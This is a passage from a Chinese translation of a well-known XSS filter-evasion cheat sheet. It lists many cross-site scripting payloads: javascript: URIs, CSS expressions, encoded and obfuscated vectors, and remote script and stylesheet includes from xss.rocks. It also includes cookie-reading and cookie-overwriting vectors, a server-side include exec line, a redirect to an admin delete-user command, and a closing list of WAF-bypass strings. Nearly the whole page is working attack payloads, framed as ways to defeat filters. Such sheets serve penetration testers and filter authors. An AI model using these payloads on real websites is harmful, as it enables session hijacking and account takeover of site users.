    99.  onSubmit() (需要用户或攻击者提交表单)

    100.onTimeError() (用户或攻击者设置时间属性出现错误时触发)

    101.onTrackChange() (用户或攻击者改变播放列表内歌曲时触发)

    102.onUndo() (用户返回上一浏览记录页面时触发)

    103.onUnload() (用户点击任意链接或按下后退按钮或攻击者强制进行点击时触发)

    104.onURLFlip() (当一个高级流媒体格式（ASF）文件，由一个HTML+TIME（基于时间交互的多媒体扩展）媒体标签播放时，可触发在ASF文件中内嵌的攻击脚本)

    105.seekSegmentTime() (这是一个方法可以定位元素某个时间段内中的特定的点，并可以从该点播放。这个段落包含了一个重复的时间线，并包括使用AUTOREVERSE属性进行反向播放。)
</code></pre>

<h2 id="bgsound">BGSOUND</h2>

<pre><code class="language-php+HTML">&lt;BGSOUND SRC="javascript:alert('XSS');"&gt;
</code></pre>

<h2 id="-javascript包含">&amp; JavaScript包含</h2>

<pre><code class="language-php+HTML">&lt;BR SIZE="&amp;{alert('XSS')}"&gt;
</code></pre>

<h2 id="样式表">样式表</h2>

<pre><code class="language-php+HTML">&lt;LINK REL="stylesheet" HREF="javascript:alert('XSS');"&gt; 
</code></pre>

<h2 id="远程样式表">远程样式表</h2>

<p>利用像远程样式表一样简单的形式，你可以将XSS攻击代码包含在可使用内置表达式进行重定义的样式参数里。)这只在IE和使用IE渲染模式Netscape8.1+。注意这里没有任何元素在页面中表明这页面包含了JavaScript。提示：这些远程样式表都使用了body标签,所以必须在页面中有除了攻击向量以外的内容存在时才会生效, 也就是如果是空白页的话你必须在页面添加一个字母来让攻击代码生效:</p>

<pre><code class="language-php+HTML">&lt;LINK REL="stylesheet" HREF="http://xss.rocks/xss.css"&gt; 
</code></pre>

<h2 id="远程样式表2">远程样式表2</h2>

<p>这个和上面一样有效，不过使用了<style>标签替代<link />标签.  这个细微的变化曾经用来攻击谷歌桌面。另一方面，如果在攻击向量后有HTML标签闭合攻击向量，你可以移除末尾的</style>标签。在进行跨站脚本攻击时，如不能同时使用等号或斜杠，这是非常有用的，这种情况在现实世界里不止一次发生了:</p>

<pre><code class="language-php+HTML">&lt;STYLE&gt;@import'http://xss.rocks/xss.css';&lt;/STYLE&gt; 
</code></pre>

<h2 id="远程样式表3">远程样式表3</h2>

<p>这种方式仅在Opera 8.0(9.x不可以)中有效，但方法比较有创意.  根据RFC2616，设置一个Link头部不是HTTP1.1规范的一部分,但一些浏览器仍然允许这样做 (例如Firefox和  Opera).  这里的技巧是设置一个头部（和普通头部并没有什么区别，只是设置Link: <a href="http://xss.rocks/xss.css">http://xss.rocks/xss.css</a>; REL=stylesheet）并且在远程样式表中包含使用了JavaScript的跨站脚本攻击向量，这一点是FireFox不支持的:</p>

<pre><code class="language-php+HTML">&lt;META HTTP-EQUIV="Link" Content="&lt;http://xss.rocks/xss.css&gt;; REL=stylesheet"&gt; 
</code></pre>

<h2 id="远程样式表4">远程样式表4</h2>

<p>这仅能在Gecko渲染引擎下有效并且需要在父页面绑定一个XML文件。具有讽刺意味的是 Netscape认为Gecko更安全 ，所以对绝大多数网站来说会受到漏洞影响:</p>

<pre><code class="language-php+HTML">&lt;STYLE&gt;BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}&lt;/STYLE&gt;
</code></pre>

<h2 id="含有分隔javascript的style标签">含有分隔JavaScript的STYLE标签</h2>

<p>这个XSS会在IE中造成无限循环:</p>

<pre><code class="language-php+HTML">&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert("XSS")';&lt;/STYLE&gt; 
</code></pre>

<h2 id="style属性中使用注释分隔表达式">STYLE属性中使用注释分隔表达式</h2>

<pre><code class="language-php+HTML">&lt;IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"&gt;
</code></pre>

<h2 id="含表达式的img-style">含表达式的IMG STYLE</h2>

<p>这是一个将上面XSS攻击向量混合的方法，但确实展示了STYLE标签可以用相当复杂的方式分隔，和上面一样，也会让IE进入死循环:</p>

<pre><code class="language-php+HTML">exp/*&lt;A STYLE='no\xss:noxss("*//*");

xss:ex/*XSS*//*/*/pression(alert("XSS"))'&gt;
</code></pre>

<h2 id="style标签仅旧版本netscape可用">STYLE标签（仅旧版本Netscape可用）</h2>

<pre><code class="language-php+HTML">&lt;STYLE TYPE="text/javascript"&gt;alert('XSS');&lt;/STYLE&gt; 
</code></pre>

<h2 id="使用背景图像的style标签">使用背景图像的STYLE标签</h2>

<pre><code class="language-php+HTML">&lt;STYLE&gt;.XSS{background-image:url("javascript:alert('XSS')");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt; 
</code></pre>

<h2 id="使用背景的style标签">使用背景的STYLE标签</h2>

<pre><code class="language-php+HTML">&lt;STYLE type="text/css"&gt;BODY{background:url("javascript:alert('XSS')")}&lt;/STYLE&gt;
</code></pre>

<h2 id="含style属性的html任意标签">含STYLE属性的HTML任意标签</h2>

<p>IE6.0和IE渲染引擎模式下的Netscape 8.1+并不关心你建立的HTML标签是否存在，只要是由尖括号和字母开始的即可:</p>

<pre><code class="language-php+HTML">&lt;XSS STYLE="behavior: url(xss.htc);"&gt;
</code></pre>

<h2 id="本地htc文件">本地htc文件</h2>

<p>这和上面两个跨站脚本攻击向量有些不同，因为它使用了一个必须和XSS攻击向量在相同服务器上的.htc文件。这个示例文件通过下载JavaScript并将其作为style属性的一部分运行来进行攻击</p>

<pre><code class="language-php+HTML">&lt;XSS STYLE="behavior: url(xss.htc);"&gt;     
</code></pre>

<h2 id="us-ascii编码">US-ASCII编码</h2>

<p>US-ASCII编码（由Kurt  Huwig发现）。它使用了畸形的7位ASCII编码来代替8位。这个XSS攻击向量可以绕过大多数内容过滤器，但是只在主机使用US-ASCII编码传输数据时有效，或者可以自己设置编码格式。相对绕过服务器端过滤，这在绕过WAF跨站脚本过滤时候更有效。Apache Tomcat是目前唯一已知使用US-ASCII编码传输的：</p>

<pre><code class="language-php+HTML">¼script¾alert(¢XSS¢)¼/script¾ 
</code></pre>

<h2 id="meta">META</h2>

<p>关于meta刷新比较奇怪的是它并不会在头部中发送一个referrer-所以它通常用于不需要referrer的时候:</p>

<pre><code class="language-php+HTML">&lt;META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"&gt; 
</code></pre>

<h2 id="使用数据的meta"><strong>使用数据的META</strong></h2>

<p>URL  scheme指令。这个非常有用因为它并不包含任何可见的SCRIPT单词或JavaScript指令,因为它使用了base64编码.请查看RFC  2397寻找更多细节。你同样可以使用具有Base64编码功能的XSS工具来编码HTML或JavaScript:</p>

<pre><code class="language-php+HTML">&lt;META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html 
base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"&gt;
</code></pre>

<h2 id="含有额外url参数的meta"><strong>含有额外URL参数的META</strong></h2>

<p>如果目标站点尝试检查URL是否包含”http://”，你可以用以下技术规避它(由Moritz Naumann提交):</p>

<pre><code class="language-php+HTML">&lt;META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"&gt; 
</code></pre>

<h2 id="iframe">IFRAME</h2>

<p>如果允许Iframe那就会有很多XSS问题:</p>

<pre><code class="language-php+HTML">&lt;IFRAME SRC="javascript:alert('XSS');"&gt;&lt;/IFRAME&gt;  
</code></pre>

<h2 id="基于事件iframe">基于事件IFRAME</h2>

<p>Iframes和大多数其他元素可以使用下列事件（由David Cross提交）:</p>

<pre><code class="language-php+HTML">&lt;IFRAME SRC=# onmouseover="alert(document.cookie)"&gt;&lt;/IFRAME&gt; 
</code></pre>

<h2 id="frame">FRAME</h2>

<p>Frames和iframe一样有很多XSS问题:</p>

<pre><code class="language-php+HTML">&lt;FRAMESET&gt;&lt;FRAME SRC="javascript:alert('XSS');"&gt;&lt;/FRAMESET&gt;
</code></pre>

<h2 id="table">TABLE</h2>

<pre><code class="language-php+HTML">&lt;TABLE BACKGROUND="javascript:alert('XSS')"&gt;  
</code></pre>

<h2 id="td"><strong>TD</strong></h2>

<p>和上面一样，TD也可以通过BACKGROUND来包含JavaScriptXSS攻击向量:</p>

<pre><code class="language-php+HTML">&lt;TABLE&gt;&lt;TD BACKGROUND="javascript:alert('XSS')"&gt; 
</code></pre>

<h2 id="div">DIV</h2>

<pre><code class="language-php+HTML">&lt;DIV STYLE="background-image: url(javascript:alert('XSS'))"&gt; 
</code></pre>

<h2 id="含有unicode-xss利用代码的div背景图像"><strong>含有Unicode XSS利用代码的DIV背景图像</strong></h2>

<p>这进行了一些修改来混淆URL参数。原始的漏洞是由RenaudLifchitz在Hotmail发现的:</p>

<pre><code class="language-php+HTML">&lt;DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"&gt; 
</code></pre>

<h2 id="含有额外字符的div背景图像"><strong>含有额外字符的DIV背景图像</strong></h2>

<p>Rnaske进行了一个快速的XSS模糊测试来发现IE和安全模式下的Netscape  8.1中任何可以在左括号和JavaScript指令间加入的额外字符。这都是十进制的但是你也可以使用十六进制来填充（以下字符可用：1-32,  34, 39, 160, 8192-8.13, 12288, 65279）:</p>

<pre><code class="language-php">&lt;DIV STYLE="background-image: url(&amp;#1;javascript:alert('XSS'))"&gt;
</code></pre>

<h2 id="div表达式"><strong>DIV表达式</strong></h2>

<p>一个非常有效的对抗现实中的跨站脚本过滤器的变体是在冒号和”expression”之间添加一个换行：</p>

<pre><code class="language-php+HTML">&lt;DIV STYLE="width: expression(alert('XSS'));"&gt;
</code></pre>

<h2 id="html-条件选择注释块">html 条件选择注释块</h2>

<p>只能在IE5.0及更高版本和IE渲染引擎模式下的Netscape  8.1生效。一些网站认为在注释中的任何内容都是安全的并且认为没有必要移除，这就允许我们添加跨站脚本攻击向量。系统会在一些内容周围尝试添加注释标签以便安全的渲染它们。如我们所见，这有时并不起作用：</p>

<pre><code class="language-php+HTML">&lt;!--[if gte IE 4]&gt;
&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;
&lt;![endif]--&gt;
</code></pre>

<h2 id="base标签">BASE标签</h2>

<p>在IE和安全模式下的Netscape  8.1有效。你需要使用//来注释下个字符，这样你就不会造成JavaScript错误并且你的XSS标签可以被渲染。同样，这需要当前网站使用相对路径例如”images/image.jpg”来放置图像而不是绝对路径。如果路径以一个斜杠开头例如”/images/image.jpg”你可以从攻击向量中移除一个斜杠（只有在两个斜杠时注释才会生效）：</p>

<pre><code class="language-php+HTML">&lt;BASE HREF="javascript:alert('XSS');//"&gt;
</code></pre>

<h2 id="object标签">OBJECT标签</h2>

<p>如果允许使用OBJECT，你可以插入一个病毒攻击载荷来感染用户，类似于APPLET标签。链接文件实际是含有你XSS攻击代码的HTML文件:</p>

<pre><code class="language-php+HTML">&lt;OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"&gt;&lt;/OBJECT&gt;  
</code></pre>

<h2 id="使用embed标签加载含有xss的flash文件">使用EMBED标签加载含有XSS的FLASH文件</h2>

<p>如果你添加了属性allowScriptAccess=”never”以及allownetworking=”internal”则可以减小风险（感谢Jonathan Vanasco提供的信息）:</p>

<pre><code class="language-php+HTML">&lt;EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw        IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"&gt;&lt;/EMBED&gt; 
</code></pre>

<h2 id="使用embed-svg包含攻击向量">使用EMBED SVG包含攻击向量</h2>

<p>该示例只在FireFox下有效，但是比上面的攻击向量在FireFox下好，因为不需要用户安装或启用FLASH。</p>

<pre><code class="language-php+HTML">&lt;EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw        IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"&gt;&lt;/EMBED&gt;
</code></pre>

<h2 id="在flash中使用actionscript混淆xss攻击向量">在FLASH中使用ActionScript混淆XSS攻击向量</h2>

<pre><code class="language-php+HTML">a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
</code></pre>

<h2 id="cdata混淆的xml数据岛">CDATA混淆的XML数据岛</h2>

<p>这个XSS攻击只在IE和使用IE渲染模式的Netscape 8.1下有效-攻击向量由Sec Consult在审计Yahoo时发现</p>

<pre><code class="language-php+HTML">&lt;XML ID="xss"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC="javas&lt;!-- --&gt;cript:alert('XSS')"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
&lt;SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"&gt;&lt;/SPAN&gt;
</code></pre>

<h2 id="使用xml数据岛生成含内嵌javascript的本地xml文件">使用XML数据岛生成含内嵌JavaScript的本地XML文件</h2>

<p>这和上面是一样的但是将来源替换为了包含跨站脚本攻击向量的本地XML文件（必须在同一服务器上）</p>

<pre><code class="language-php+HTML">&lt;XML SRC="xsstest.xml" ID=I&gt;&lt;/XML&gt;
&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
</code></pre>

<h2 id="xml中使用htmltime">XML中使用HTML+TIME</h2>

<p>这是Grey Magic攻击Hotmail和Yahoo的方法。这只在IE和IE渲染模式下的Netscape8.1有效并且记得需要在HTML域的BODY标签中间才有效：</p>

<pre><code class="language-php+HTML">&lt;HTML&gt;&lt;BODY&gt;        
&lt;?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"&gt;
&lt;?import namespace="t" implementation="#default#time2"&gt;
&lt;t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert("XSS")&lt;/SCRIPT&gt;"&gt;
&lt;/BODY&gt;&lt;/HTML&gt;
</code></pre>

<h2 id="使用一些字符绕过js过滤">使用一些字符绕过”.js”过滤</h2>

<p>你可以将你的JavaScript文件重命名为图像来作为XSS攻击向量：</p>

<pre><code class="language-php+HTML">&lt;SCRIPT SRC="http://xss.rocks/xss.jpg"&gt;&lt;/SCRIPT&gt; 
</code></pre>

<h2 id="ssi服务端脚本包含">SSI（服务端脚本包含）</h2>

<p>这需要在服务器端允许SSI来使用XSS攻击向量。似乎不用提示这点，因为如果你可以在服务器端执行指令那一定是有更严重的问题存在：</p>

<pre><code class="language-php+HTML">&lt;!--#exec cmd="/bin/echo '&lt;SCR'"--&gt;&lt;!--#exec cmd="/bin/echo 'IPT SRC=http://xss.rocks/xss.js&gt;&lt;/SCRIPT&gt;'"--&gt;
</code></pre>

<h2 id="php">PHP</h2>

<p>需要服务器端安装了PHP来使用XSS攻击向量。同样，如果你可以远程运行任意脚本，那会有更加严重的问题：</p>

<pre><code class="language-php+HTML">&lt;? echo('&lt;SCR)';
echo('IPT&gt;alert("XSS")&lt;/SCRIPT&gt;'); ?&gt;
</code></pre>

<h2 id="嵌入命令的image">嵌入命令的IMAGE</h2>

<p>当页面受密码保护并且这个密码保护同样适用于相同域的不同页面时有效，这可以用来进行删除用户，增加用户（如果访问页面的是管理员的话），将密码发送到任意地方等等。。。这是一个较少使用当时更有价值的XSS攻击向量</p>

<pre><code class="language-php+HTML">&lt;IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"&gt; 
</code></pre>

<h2 id="嵌入命令的image-ii"><strong>嵌入命令的IMAGE II</strong></h2>

<p>这更加可怕因为这不包含任何可疑标识，除了它不在你自己的域名上。这个攻击向量使用一个302或304（其他的也有效）来重定向图片到指定命令。所以一个普通的<img src="httx://badguy.com/a.jpg" />对于访问图片链接的用户来说也有可能是一个攻击向量。下面是利用.htaccess（Apache）配置文件来实现攻击向量。（感谢Timo提供这部分。）：</p>

<pre><code class="language-php+HTML">Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser
</code></pre>

<h2 id="cookie篡改">Cookie篡改</h2>

<p>尽管公认不太实用，但是还是可以发现一些允许使用META标签的情况下可用它来覆写cookie。另外的例子是当用户访问网站页面时，一些网站读取并显示存储在cookie中的用户名，而不是数据库中。当这两种场景结合时，你可以修改受害者的cookie以便将JavaScript注入到其页面中（你可以使用这个让用户登出或改变他们的用户状态，甚至可以让他们以你的账户登录）</p>

<pre><code class="language-php+HTML">&lt;META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"&gt;    
</code></pre>

<h2 id="utf-7编码">UTF-7编码</h2>

<p>如果存在XSS的页面没有提供页面编码头部，或者使用了任何设置为使用UTF-7编码的浏览器，就可以使用下列方式进行攻击（感谢Roman  Ivanov提供）。这在任何不改变编码类型的现代浏览器上是无效的，这也是为什么标记为完全不支持的原因。Watchfire在Google的自定义404脚本中发现这个问题：</p>

<pre><code class="language-php+HTML">&lt;HEAD&gt;&lt;META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
</code></pre>

<h2 id="利用html引号包含的xss">利用HTML引号包含的XSS</h2>

<p>这在IE中测试通过，但还得视情况而定。它是为了绕过那些允许”<script>"但是不允许"&lt;SCRIPT SRC..."形式的正则过滤即"/&lt;script[^&gt;]+src/i"：</script></p>

<pre><code class="language-php+HTML">&lt;SCRIPT a="&gt;" SRC="httx://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;
</code></pre>

<p>这是为了绕过那些允许”<script>"但是不允许"&lt;SCRIPTSRC..."形式的正则过滤即"  /&lt;script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'"&gt;\s]+))?)+\s*|\s*)src/i"（这很重要，因为在实际环境中出现过这种正则过滤）：</script></p>

<pre><code class="language-php+HTML">&lt;SCRIPT ="&gt;" SRC="httx://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;
</code></pre>

<table>
  <tbody>
    <tr>
      <td>另一个绕过此正则过滤” /&lt;script((\s+\w+(\s<em>=\s</em>(?:”(.)*?”</td>
      <td>’(.)*?’</td>
      <td>[^’”&gt;\s]+))?)+\s*</td>
      <td>\s*)src/i”的XSS：</td>
    </tr>
  </tbody>
</table>

<pre><code class="language-php+HTML">&lt;SCRIPT a="&gt;" '' SRC="httx://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;  
</code></pre>

<table>
  <tbody>
    <tr>
      <td>又一个绕过正则过滤”  /&lt;script((\s+\w+(\s<em>=\s</em>(?:”(.)*?”</td>
      <td>’(.)*?’</td>
      <td>[^’”&gt;\s]+))?)+\s*</td>
      <td>\s*)src/i”的XSS。尽管不想提及防御方法，但如果你想允许<script>标签但不加载远程脚本，针对这种XSS只能使用状态机去防御（当然如果允许<script>标签的话，还有其他方法绕过）</script></script></td>
    </tr>
  </tbody>
</table>

<pre><code class="language-php+HTML">&lt;SCRIPT "a='&gt;'" SRC="httx://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;
</code></pre>

<table>
  <tbody>
    <tr>
      <td>最后一个绕过此正则过滤” /&lt;script((\s+\w+(\s<em>=\s</em>(?:”(.)*?”</td>
      <td>’(.)*?’</td>
      <td>[^’”&gt;\s]+))?)+\s*</td>
      <td>\s*)src/i”的XSS，使用了重音符（在FireFox下无效）：</td>
    </tr>
  </tbody>
</table>

<pre><code class="language-php+HTML">&lt;SCRIPT a=`&gt;` SRC="httx://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;
</code></pre>

<p>这是一个XSS样例，用来绕过那些不会检查引号配对，而是发现任何引号就立即结束参数字符串的正则表达式：</p>

<pre><code class="language-php+HTML">&lt;SCRIPT a="&gt;'&gt;" SRC="httx://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt; 
</code></pre>

<h2 id="url字符绕过">URL字符绕过</h2>

<p>假定”http://www.google.com/”是不被允许的：</p>

<p><strong>IP代替域名</strong></p>

<pre><code class="language-php+HTML">&lt;A HREF="http://66.102.7.147/"&gt;XSS&lt;/A&gt;   
</code></pre>

<p><strong>URL编码</strong></p>

<pre><code class="language-php+HTML">&lt;A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D"&gt;XSS&lt;/A&gt;
</code></pre>

<p><strong>双字节编码</strong></p>

<pre><code class="language-php+HTML">&lt;A HREF="http://1113982867/"&gt;XSS&lt;/A&gt;
</code></pre>

<p><strong>十六进制编码</strong></p>

<p>每个数字的允许的范围大概是240位字符，就如你在第二位上看到的，并且由于十六进制是在0到F之间，所以开头的0可以省略:</p>

<pre><code class="language-php+HTML">&lt;A HREF="http://0x42.0x0000066.0x7.0x93/"&gt;XSS&lt;/A&gt;  
</code></pre>

<p><strong>八进制编码</strong></p>

<p>又一次允许填充，尽管你必须保证每类在4位字符以上-例如A类，B类等等</p>

<pre><code class="language-php+HTML">  &lt;A HREF="http://0102.0146.0007.00000223/"&gt;XSS&lt;/A&gt;
</code></pre>

<h3 id="混合编码"><strong>混合编码</strong></h3>

<p>让我们混合基本编码并在其中插入一些TAB和换行，虽然不知道浏览器为什么允许这样做。TAB和换行只有被引号包含时才有效</p>

<pre><code class="language-php+HTML">    &lt;A HREF="h

    tt	p://6	6.000146.0x7.147/"&gt;XSS&lt;/A&gt;
</code></pre>

<p><strong>协议解析绕过</strong></p>

<table>
  <tbody>
    <tr>
      <td>(// 替代http://可以节约很多字节).当输入空间有限时很有用(少两个字符可能解决大问题)  而且可以轻松绕过类似”(ht</td>
      <td>f)tp(s)?://”的正则过滤(感谢Ozh提供这部分).你也可以将”//”换成”\“。你需要保证斜杠在正确的位置，否则可能被当成相对路径URL:</td>
    </tr>
  </tbody>
</table>

<pre><code class="language-php+HTML">&lt;A HREF="//www.google.com/"&gt;XSS&lt;/A&gt;
</code></pre>

<p><strong>Google的”feeling lucky”功能1</strong></p>

<p>Firefox使用Google的”feeling  lucky”功能根据用户输入的任何关键词来将用户重定向。如果你存在漏洞的页面在某些随机关键词上搜索引擎排名是第一的，你就可以利用这一特性来攻击FireFox用户。这使用了Firefox的”keyword:”协议。你可以像下面一样使用多个关键词”keyword:XSS+RSnake”。这在Firefox2.0后不再有效.</p>

<pre><code class="language-php+HTML">&lt;A HREF="//google"&gt;XSS&lt;/A&gt;
</code></pre>

<p><strong>Google的”feeling lucky”功能2</strong></p>

<p>这使用了一个仅在FireFox上有效的小技巧，因为它实现了”feelinglucky”功能。不像下面一个例子，这个在Opera上无效因为Opera会认为只是一个老式的HTTP基础认证钓鱼攻击，但它并不是。它只是一个畸形的URL。如果你点击了对话框的确定，它就可以生效。但是在Opera上会是一个错误对话框，所以认为其不被Opera所支持，同样在Firefox2.0后不再有效。</p>

<pre><code class="language-php">&lt;A HREF="http://ha.ckers.org@google"&gt;XSS&lt;/A&gt;
</code></pre>

<p><strong>Google的”feeling lucky”功能3</strong></p>

<p>这是一个畸形的URL只在FireFox和Opera下有效，因为它们实现了”feeling lucky”功能。像上面的例子一样，它要求你的攻击页面在Google上特定关键词排名第一（在这个示例里关键词是”google”）</p>

<pre><code class="language-php">&lt;A HREF="http://google:ha.ckers.org"&gt;XSS&lt;/A&gt;
</code></pre>

<p><strong>移除别名</strong></p>

<p>当结合上面的URL，移除”www.”会节约4个字节，总共为正确设置的服务器节省9字节:</p>

<pre><code class="language-php+HTML">&lt;A HREF="http://google.com/"&gt;XSS&lt;/A&gt;
</code></pre>

<p><strong>绝对DNS名称后额外的点</strong></p>

<pre><code class="language-php">&lt;A HREF="http://www.google.com./"&gt;XSS&lt;/A&gt;
</code></pre>

<p><strong>JavaScriptlink location</strong></p>

<pre><code class="language-php">&lt;A HREF="javascript:document.location='http://www.google.com/'"&gt;XSS&lt;/A&gt;
</code></pre>

<p><strong>内容替换作为攻击向量</strong></p>

<p>假设”http://www.google.com/”会自动替换为空。我实际使用过类似的攻击向量即通过使用转换过滤器本身（示例如下）来帮助构建攻击向量以对抗现实世界的XSS过滤器:</p>

<pre><code class="language-php">&lt;A HREF="http://www.google.com/ogle.com/"&gt;XSS&lt;/A&gt;
</code></pre>

<h2 id="字符转义表">字符转义表</h2>

<p>下面是HTML和JavaScript中字符“&lt;”的所有可能组合。其中大部分不会被渲染出来，但其中许多可以在某些情况下呈现出来。</p>

<pre><code class="language-php">&lt;
%3C
&amp;lt
&amp;lt;
&amp;LT
&amp;LT;
&amp;#60
&amp;#060
&amp;#0060
&amp;#00060
&amp;#000060
&amp;#0000060
&amp;#60;
&amp;#060;
&amp;#0060;
&amp;#00060;
&amp;#000060;
&amp;#0000060;
&amp;#x3c
&amp;#x03c
&amp;#x003c
&amp;#x0003c
&amp;#x00003c
&amp;#x000003c
&amp;#x3c;
&amp;#x03c;
&amp;#x003c;
&amp;#x0003c;
&amp;#x00003c;
&amp;#x000003c;
&amp;#X3c
&amp;#X03c
&amp;#X003c
&amp;#X0003c
&amp;#X00003c
&amp;#X000003c
&amp;#X3c;
&amp;#X03c;
&amp;#X003c;
&amp;#X0003c;
&amp;#X00003c;
&amp;#X000003c;
&amp;#x3C
&amp;#x03C
&amp;#x003C
&amp;#x0003C
&amp;#x00003C
&amp;#x000003C
&amp;#x3C;
&amp;#x03C;
&amp;#x003C;
&amp;#x0003C;
&amp;#x00003C;
&amp;#x000003C;
&amp;#X3C
&amp;#X03C
&amp;#X003C
&amp;#X0003C
&amp;#X00003C
&amp;#X000003C
&amp;#X3C;
&amp;#X03C;
&amp;#X003C;
&amp;#X0003C;
&amp;#X00003C;
&amp;#X000003C;
\x3c
\x3C
\u003c
\u003C
</code></pre>

<h1 id="绕过waf的方法">绕过WAF的方法</h1>

<h2 id="通用问题">通用问题</h2>

<h3 id="存储型xss">存储型XSS</h3>

<p>如果攻击者已经让XSS绕过过滤器，WAF无法阻止攻击透过</p>

<h3 id="基于javascript的反射型xss">基于JavaScript的反射型XSS</h3>

<pre><code class="language-php">示例: &lt;script&gt; ... setTimeout(\"writetitle()\",$_GET[xss]) ... &lt;/script&gt;

利用: /?xss=500); alert(document.cookie);//
</code></pre>

<h3 id="基于dom的xss">基于DOM的XSS</h3>

<pre><code class="language-php">示例: &lt;script&gt; ... eval($_GET[xss]); ... &lt;/script&gt;

利用: /?xss=document.cookie
</code></pre>

<h2 id="通过请求重定向构造xss"><strong>通过请求重定向构造XSS</strong></h2>

<p>存在漏洞代码:</p>

<pre><code class="language-php+HTML">    ...

     header('Location: '.$_GET['param']);

    ...
</code></pre>

<p>同样包括:</p>

<pre><code class="language-php">    ...

     header('Refresh: 0; URL='.$_GET['param']);

    ...
</code></pre>

<p>这种请求不会绕过WAF:</p>

<pre><code class="language-php">/?param=javascript:alert(document.cookie)
</code></pre>

<p>这种请求可以绕过WAF并且XSS攻击可以在某些浏览器执行:</p>

<pre><code class="language-php">/?param=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
</code></pre>

<p><strong>绕过</strong>WAF可用<strong>字符串.</strong></p>

<pre><code class="language-php+HTML">    &lt;Img src = x onerror = "javascript: window.onerror = alert; throw XSS"&gt;

    &lt;Video&gt; &lt;source onerror = "javascript: alert (XSS)"&gt;

    &lt;Input value = "XSS" type = text&gt;

    &lt;applet code="javascript:confirm(document.cookie);"&gt;

    &lt;isindex x="javascript:" onmouseover="alert(XSS)"&gt;

    "&gt;&lt;/SCRIPT&gt;”&gt;’&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;

    "&gt;&lt;img src="x:x" onerror="alert(XSS)"&gt;

    "&gt;&lt;iframe src="javascript:alert(XSS)"&gt;

    &lt;object data="javascript:alert(XSS)"&gt;

    &lt;isindex type=image src=1 onerror=alert(XSS)&gt;

    &lt;img src=x:alert(alt) onerror=eval(src) alt=0&gt;

    &lt;img  src="x:gif" onerror="window['al\u0065rt'](0)"&gt;&lt;/img&gt;

    &lt;iframe/src="data:text/html,&lt;svg onload=alert(1)&gt;"&gt;

    &lt;meta content="&amp;NewLine; 1 &amp;NewLine;; JAVASCRIPT&amp;colon; alert(1)" http-equiv="refresh"/&gt;

    &lt;svg&gt;&lt;script xlink:href=data&amp;colon;,window.open('https://www.google.com/')&gt;&lt;/script

    &lt;meta http-equiv="refresh" content="0;url=javascript:confirm(1)"&gt;

    &lt;iframe src=javascript&amp;colon;alert&amp;lpar;document&amp;period;location&amp;rpar;&gt;

    &lt;form&gt;&lt;a href="javascript:\u0061lert(1)"&gt;X

    &lt;/script&gt;&lt;img/*%00/src="worksinchrome&amp;colon;prompt(1)"/%00*/onerror='eval(src)'&gt;

